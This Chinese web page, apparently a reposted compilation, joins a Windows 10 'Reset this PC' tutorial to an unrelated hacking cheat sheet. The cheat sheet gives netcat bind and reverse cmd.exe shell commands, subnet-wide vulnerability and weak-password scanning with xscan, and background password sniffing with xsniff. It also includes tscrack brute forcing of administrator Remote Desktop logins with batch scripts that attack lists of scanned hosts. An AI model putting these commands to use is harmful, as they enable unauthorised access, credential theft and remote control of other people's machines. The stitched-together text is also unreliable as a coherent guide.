1.Win10重置此电脑功能如何使用
Win10重置此电脑怎么用,另外在进行此项操作之前,需要了解Win10重置此电脑的结果是什么 Win10重置此电脑使用教程windows10教程 win10重置此电脑是什么意思 重置此电脑就是恢复出厂设置的意思,可以初始化当前的系统,重新安装Windows。
在Win10的RE模式中的 疑难解答 里,可以让你“重置此电脑”或者“回到上一个系统”。 1。
重置此电脑 作用:把Windows 10系统全自动的重新安装一次,可以选择是否保留现有的软件,应用和资料。 2。
回退到以前的版本(在疑难解答的高级选项中) 是指通过“升级”方式,安装win10的,可以直接回到升级前的系统。比如从Win7升级到win10的,回退到 Win7。
(会保留原有系统的所有软件应用和资料) 您可以自行选择是尝试重新安装一次win10来解决现在的故障,或者放弃Win10返回原来的系统。 Win10重置电脑在哪?怎么用? Win10的“重置此电脑”的位置在“设置 - 更新和安全 - 恢复”里,点击“开始”就可以开始进行重置了,如图所示。
接下来会出现这个图片,第一个选项里所说的“文件”指的是 C:users 里的文件,对 C盘之外的分区没有影响,这个选项不是非常彻底,最明显的特征就是恢复完和原来相比没什么差别。一般选择的是第二个选项,具体作用到下一步再说。
这里,我们选择“删除所有内容”。 这一步是选择要删除内容的分区(这里称作“驱动器”),就是我们常说的 C盘D盘等等了。
“仅限安装了 Windows 的驱动器”就是指的 C盘。“所有驱动器”指的是除了恢复分区等隐藏分区的所有分区,如果一不小心选了这个,那么其他盘的文件就被删除了,一定不要选择第二个选项。
不确定的话可以点击最下方的选项确认一下会受影响的分区。 这两个选项都可以理解为格式化,第一个相当于快速格式化,由于和 Win8/8。
1 的恢复原理以及效果不太一样,因此不能说是真正意义上的格式化,因为在恢复之后,一些驱动还在,有些时候甚至会出现 Windows。 old 或者 ~Windows。
BT 文件夹,不能说是完全格式化,但是效果和重置是差不多的。这里所说的“文件”就是指的所选分区的全部文件了。
第二个选项属于低级格式化,它要擦除所选分区的所有数据,使数据难以恢复,一方面耗时长,另一方面对硬盘也有较大的影响,如果不是防止转让给别人之后别人恢复你的数据就没有必要选择这个选项。 在这里选择第一个选项。
接下来等待片刻,如图。 出现这个就说明没有问题了,点击“重置”即可。
然后是这样,准备完成之后会自动重启进行重置。 有时候会卡住很长时间一动不动,这时断网就可以解决。
正在重置此电脑,这个过程一般需要一个小时左右。 到此结束。
接下来是一些总结。 1、重置此电脑和直接格盘重装哪个好好像是公说公有理,婆说婆有理。
但各自的特点也都比较明显,从时间上看,格盘重装有着绝对的优势;但也有人说,重置之后比重装更清爽流畅;还有重置可以保留驱动,这个地方相比于格盘重装是一个优势。 2、和 Win8/8。
1 的不同之处:Win8/8。 1 的“恢复”功能和 Win10 的重置此电脑功能操作基本相同,但有个地方不一样。
Win8/8。1 要想使用恢复功能,必须要有一个恢复映像(可以是原版镜像中的 install。
wim/esd 也可以是自己用 dism 备份的 wim/esd 文件,但必须是 Win8/8。 1 的映像,防止会提示错误)存放分区,并且要用 reagentc 命令进行配置恢复环境。
Win10 则不需要这个,只要有那个 450M 恢复分区就可以进行重置,这样表面上看起来是个好事,确实是省了很多操作,但是更多情况下恐怕是个坏事,因为在 Win10 里,即便是用 reagentc 命令配置了恢复环境,指定了恢复映像,在重置的时候仍然没有作用,纵然是进行了这个操作: 重置之后依旧是纯净的 Win10。 也就是说,在 Win10 里很难用自定义的映像文件来恢复系统。
注:不要太依赖于“重置此电脑”,因为在少数情况下,重置总是会出现错误。最好的方法是,用 U盘格盘安装之后,装上驱动和常用软件,清理一下 C盘之后用 dism 或者 dism 备份好,需要恢复的时候在 pe 里直接恢复就行了,效率比重置此电脑高得多。
2.nc.exe使用方法
参数说明: -h 查看帮助信息 -d 后台模式 -e prog程序重定向,一但连接就执行〔危险〕 -i secs延时的间隔 -l 监听模式,用于入站连接 -L 监听模式,连接天闭后仍然继续监听,直到CTR+C -n IP地址,不能用域名 -o film记录16进制的传输 -p[空格]端口 本地端口号 -r 随机本地及远程端口 -t 使用Telnet交互方式 -u UDP模式 -v 详细输出,用-vv将更详细 -w数字 timeout延时间隔 -z 将输入,输出关掉(用于扫锚时) 基本用法: nc -nvv 192.168.0.1 80 连接到192.168.0.1主机的80端口 nc -l -p 80 开启本机的TCP 80端口并监听 nc -nvv -w2 -z 192.168.0.1 80-1024 扫锚192.168.0.1的80-1024端口 nc -l -p 5354 -t -e c:winntsystem32cmd.exe 绑定remote主机的cmdshell在 remote的TCP 5354端口 nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 梆定remote主机的 cmdshell并反向连接192.168.0.2的5354端口 高级用法: nc -L -p 80 作为蜜罐用1:开启并不停地监听80端口,直到CTR+C为止 nc -L -p 80 > c:\log.txt 作为蜜罐用2:开启并不停地监听80端口,直到 CTR+C,同时把结果输出到c:\log.txt nc -L -p 80 存放文件的路径及名称 传送文件 到对方主机 备 注: | 管道命令 重定向命令。
“> d:\log.txt 意思是:后台执行dir,并把结果存在d:\log.txt中 >与>>的区别 ">"指:覆盖;">>"指:保存到(添加到)。 如:@dir c:\winnt >> d:\log.txt和@dir c:\winnt > d:\log.txt二个命令分别 执行二次比较看:用>>的则是把二次的结果都保存了,而用:>则只有一次的结果 ,是因为第二次的结果把第一次的覆盖了。
2、扫锚工具:xscan.exe 基本格式 xscan -host [-] [其他选项] 扫锚"起始IP到终止 IP"段的所有主机信息 xscan -file [其他选项] 扫锚"主机IP列表文件 名"中的所有主机信息 检测项目 -active 检测主机是否存活 -os 检测远程操作系统类型(通过NETBIOS和SNMP协议) -port 检测常用服务的端口状态 -ftp 检测FTP弱口令 -pub 检测FTP服务匿名用户写权限 -pop3 检测POP3-Server弱口令 -smtp 检测SMTP-Server漏洞 -sql 检测SQL-Server弱口令 -smb 检测NT-Server弱口令 -iis 检测IIS编码/解码漏洞 -cgi 检测CGI漏洞 -nasl 加载Nessus攻击脚本 -all 检测以上所有项目 其它选项 -i 适配器编号 设置网络适配器, 可通过"-l"参数获取 -l 显示所有网络适配器 -v 显示详细扫描进度 -p 跳过没有响应的主机 -o 跳过没有检测到开放端口的主机 -t 并发线程数量,并发主机数量 指定最大并发线程数量和并发主机数量, 默 认数量为100,10 -log 文件名 指定扫描报告文件名 (后缀为:TXT或HTML格式的文件) 用法示例 xscan -host 192.168.1.1-192.168.255.255 -all -active -p 检测 192.168.1.1-192.168.255.255网段内主机的所有漏洞,跳过无响应的主机 xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o 检测 192.168.1.1-192.168.255.255网段内主机的标准端口状态,NT弱口令用户,最大 并发线程数量为150,跳过没有检测到开放端口的主机 xscan -file hostlist.txt -port -cgi -t 200,5 -v -o 检测“hostlist.txt” 文件中列出的所有主机的标准端口状态,CGI漏洞,最大并发线程数量为200,同 一时刻最多检测5台主机,显示详细检测进度,跳过没有检测到开放端口的主机 3、命令行方式嗅探器: xsniff.exe 可捕获局域网内FTP/SMTP/POP3/HTTP协议密码 参数说明 -tcp 输出TCP数据报 -udp 输出UDP数据报 -icmp 输出ICMP数据报 -pass 过滤密码信息 -hide 后台运行 -host 解析主机名 -addr IP地址 过滤IP地址 -port 端口 过滤端口 -log 文件名 将输出保存到文件 -asc 以ASCII形式输出 -hex 以16进制形式输出 用法示例 xsniff.exe -pass -hide -log pass.log 后台运行嗅探密码并将密码信息保存在 pass.log文件中 xsniff.exe -tcp -udp -asc -addr 192.168.1.1 嗅探192.168.1.1并过滤tcp和 udp信息并以ASCII格式输出 4、终端服务密码破解: tscrack.exe 参数说明 -h 显示使用帮助 -v 显示版本信息 -s 在屏幕上打出解密能力 -b 密码错误时发出的声音 -t 同是发出多个连接(多线程) -N Prevent System Log entries on targeted server -U 卸载移除tscrack组件 -f 使用-f后面的密码 -F 间隔时间(频率) -l 使用-l后面的用户名 -w 使用-w后面的密码字典 -p 使用-p后面的密码 -D 登录主页面 用法示例 tscrack 192.168.0.1 -l administrator -w pass.dic 远程用密码字典文件暴破 主机的administrator的登陆密码 tscrack 192.168.0.1 -l administrator -p 123456 用密码123456远程登陆 192.168.0.1的administrator用户 @if not exist ipcscan.txt goto noscan @for /f "tokens=1 delims= " %%i in (3389.txt) do call hack.bat %%i nscan @echo 3389.txt no find or scan faild (①存为3389.bat) (假设现有用SuperScan或其它扫锚器扫到一批开有3389的主 机IP列表文件3389.txt) 3389.bat意思是:从3389.txt文件中取一个IP,接着运行hack.bat @if not exist tscrack.exe goto noscan @tscrack %1 -l administrator -w pass.dic >>rouji.txt :noscan @echo tscrack.exe no find or scan faild (②存为hack.bat) (运行3389.bat就OK,且3389.bat、hack.bat、3389.txt、pass.dic与tscrack.exe在同一个目录下;就可以等待结。
3.nc如何使用
一、基本使用 想要连接到某处: nc [-options] hostname port[s] [ports] … 绑定端口等待连接: nc -l -p port [-options] [hostname] [port] 参数: -e prog 程序重定向,一旦连接,就执行 [危险!!] -g gateway source-routing hop point[s], up to 8 G num source-routing pointer: 4, 8, 12, … -I secs 延时的间隔 -l 监听模式,用于入站连接 -n 指定数字的IP地址,不能用hostname -o file 记录16进制的传输 -p port 本地端口号 -r 任意指定本地及远程端口 -s addr 本地源地址 -t 以telnet的形式应答 -u UDP模式 -v 详细输出——用多个-v可得到更详细的内容 -z 将输入输出关掉——用于扫描时 -w secs timeout的时间 二. 它的简单使用方法 1.nc -l -p 80 监听80端口 2.nc -l -p 80 >c:\log.dat 监听80端口,并把信息记录到log.dat 3.nc -v -l -p 80 监听80端口,并显示端口信息 4.nc -l -p 80 -t -e cmd.exe 监听本地的80端口的入站信息,同时将cmd.exe重定向至80端口,当有人连接的时候,就让cmd.exe以telnet的形式应答 5.nc -v ip port 扫描某ip的某个端口 6.nc -v -z ip port-port 扫描某ip的某端口到某端口 7.nc -v -z -u ip port-port 扫描某ip的某udp端口到某udp端口 7.扫描远程主机 nc -nvv -w2 -z 192.168.x.x 80-445 扫描192.168.x.x的TCP 80到TCP445的所有端口 8.REMOTE主机绑定SHELL nc -l -p 5354 -t -e c:\winnt\system32\cmd.exe 绑定REMOTE主机的CMDSHELL在REMOTE主机的TCP5354端口 9.REMOTE主机绑定SHELL并反向连接 nc -t -e c:\winnt\system32\cmd.exe 192.168.x.x 5354 绑定REMOTE主机的CMDSHELL并反向连接到192.168.x.x的TCP5354端口 三.使用的例子 1. 计算机192.168.0.1运行:nc -v -n -p 99 计算机192.168.0.8运行:nc -e cmd.exe 192.168.0.1 99 这样我们就获得了192.168.0.8的一个shell 2.计算机192.168.0.1运行:nc -v -n 192.168.0.8 99 计算机192.168.0.8运行:nc -v -l -p 99 >d:\sc.exe 四.高级用法: 1.作攻击程序用 格式1:type c:\exploit.txt|nc -nvv 192.168.x.x 80 格式2:nc -nvv 192.168.x.x 80 c:\log.txt 使用'-L'可以不停地监听某一个端口,直到ctrl+c为止,同时把结果输出到'c:\log.txt'中,如果把'>' 改为'>>'即可以追加日志 3.作蜜罐用 nc -L -p 80。
转载请注明出处windows之家 » win10如何使用nc